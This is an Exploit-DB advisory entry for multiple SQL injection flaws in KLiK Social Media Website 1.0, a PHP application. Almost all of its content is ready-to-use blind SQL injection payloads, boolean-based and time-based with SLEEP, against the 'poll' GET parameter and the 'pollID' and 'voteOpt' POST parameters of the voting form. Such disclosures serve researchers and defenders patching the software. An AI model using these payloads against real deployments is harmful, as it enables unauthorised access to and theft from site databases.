KLiK Social Media Website 1.0 - 'Multiple' SQLi

EDB-ID:

50851

CVE:

N/A


Author:

corpse

Type:

webapps


Platform:

PHP

Date:

2022-04-07


# Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi
# Date: April 1st, 2022
# Exploit Author: corpse
# Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite
# Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite
# Version: 1.0
# Tested on: Debian 11

Parameter: poll (GET)
    Type: time-based blind
    Title: MySQL time-based blind - Parameter replace (ELT)
    Payload: poll=ELT(1079=1079,SLEEP(5))

Parameter: pollID (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS)

Parameter: voteOpt (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15